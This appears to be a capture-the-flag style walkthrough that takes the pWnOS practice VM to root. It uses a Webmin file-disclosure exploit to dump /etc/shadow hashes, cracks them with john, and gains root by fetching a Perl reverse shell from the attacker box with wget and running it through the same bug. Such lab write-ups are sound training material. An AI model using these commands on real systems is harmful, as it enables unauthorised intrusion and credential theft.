• VM: pWnOS
  • Goal: acquire root access
  • Approach: solve without automated exploitation tools

Network IP address fix for VMware

If the VM does not obtain an IP address automatically. do the following to fix it:

  • Reset the root password
  • login to Holynix as root
  • run command: rm /etc/udev/rules.d/70-persistent-net.rules
  • reboot Holynix: shutdown -r 0

After doing this, the VM should obtain an IP address correctly. Note: if you like to maintain the original root password, record the root entry in /etc/shadow file right before changing the root password and then place it back after the procedue is completed.

Enumeration

Target Discovery

First locate the IP address of my target:

nmap -n -sn 192.168.172.200-
Target: 192.168.172.214

Port scanning

nmap -p- -A 192.168.172.214
nmap scan
TCP: 22 OpenSSH 4.6p1 Debian 5build1
TCP: 80 Apache httpd 2.2.4 ((Ubuntu) PHP/5.2.3-1ubuntu6)
TCP: 139 Samba smbd 3.X – 4.X (workgroup: MSHOME)
TCP: 445 Samba smbd 3.0.26a (workgroup: MSHOME)
TCP: 10000 MiniServ 0.01 (Webmin httpd)

Check out the website

website

There isn’t much on the website. Following the Next button and fill in some info would just receive some taunting. lol

webpage 2
webpage 3

Check out Webmin site

webmin page

The webpage shows a login form to login to Webmin. I try some SQL injection test and it’s not vulnerable. So I turn to searchsploit to check for any vulnerability to Webmin.

searchsploit webmin
searchsploit webmin

There is a Arbitrary File Disclosure exploit that maybe helpful. I am trying out the 1997.php

Exploitation

Webmin: Arbitrary File Disclosure

cp /usr/share/exploitdb/exploits/multiple/remote/1997.php .
php -f 1997.php 192.168.172.214 10000 http /etc/passwd
exploit 1997

Awesome. I am able to retrieve the file /etc/passwd. Then I try to retrieve /etc/shadow and it’s also successful and obtain the following password hashes:

 root:$1$y6hGTk5a$1TpAFWhHwn44JOTsIANpk1:18164:0:99999:7:::
 vmware:$1$7nwi9F/D$AkdCcO2UfsCOM0IC8BYBb/:14042:0:99999:7:::
 obama:$1$hvDHcCfx$pj78hUduionhij9q9JrtA0:14041:0:99999:7:::
 osama:$1$Kqiv9qBp$eJg2uGCrOHoXGq0h5ehwe.:14041:0:99999:7:::
 yomama:$1$tI4FJ.kP$wgDmweY9SAzJZYqW76oDA.:14041:0:99999:7:::

Password cracking

Let’s crack the password using john the ripper:

Step 1: Combine passwd & shadow

I save the passwd & shadow files to pwnos-passwd & pwnos-shadow respectively and use the unshadow command to combine both passwd & shadow file:

unshadow pwnos-passwd pwnos-shadow > pwnos-hash

Step 2: Now perform dictionary attack using john the ripper

john --wordlist=/usr/share/wordlists/rockyou.txt pwnos-hash
john the ripper

We crack the password for user vmware: h4ckm3. We can now login using ssh.

SSH Login

ssh -l vmware 192.168.172.214
ssh login

Privilege Escalation

webwin is using perl script running as .cgi extension. The webmin exploit that we used was exploiting the LFI (Local File Inclusion) vulnerability. Typically, when retrieving the same script extension (in this case .cgi) from the webserver, the script will be executed and returns the result instead of the actual content of the script.

So we can upload a perl reverse shell script and use this webmin exploit again to try execute the reverse shell. First get a copy of perl reverse shell, update ip address & port (192.168.172.110:4000) and setup a webserver at kali box:

cp /usr/share/webshells/perl/perl-reverse-shell.pl rshell.cgi
nano rshell.cgi
python -m SimpleHTTPServer 80

Then download the cgi file to target machine:

cd /tmp
wget http://192.168.172.110/rshell.cgi
chmod 755 rshell.cgi

Setup a Netcat listener at kali box:

nc -lp 4000

Finally on another kali terminal:

php -f 1997.php 192.168.172.214 10000 http /tmp/rshell.cgi
root access

Root access obtained!

Thank you author pWnOS for the box pWnOS

Leave a Reply

Close Menu